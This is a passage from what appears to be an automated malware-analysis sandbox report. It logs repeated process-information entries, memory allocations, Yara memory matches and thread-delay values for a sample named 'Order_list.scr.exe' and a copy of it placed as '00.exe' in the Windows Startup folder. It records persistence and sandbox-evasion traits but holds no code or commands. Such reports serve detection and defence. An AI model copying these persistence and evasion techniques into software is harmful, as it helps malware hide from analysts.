            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 4610000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599824Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599699Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599593Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599484Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599375Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599156Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599046Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598936Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598718Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597382Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597137Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596853Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596511Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596077Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595952Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594417Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594305Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594181Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599469Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599250Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599030Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598897Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598225Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597225Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595687Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595468Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594265Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3609Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeWindow / User API: threadDelayed 2755Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeWindow / User API: threadDelayed 7088Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3993Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1762Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeWindow / User API: threadDelayed 2557Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeWindow / User API: threadDelayed 7292Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 3609 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4364Thread sleep count: 300 > 30Jump to behavior
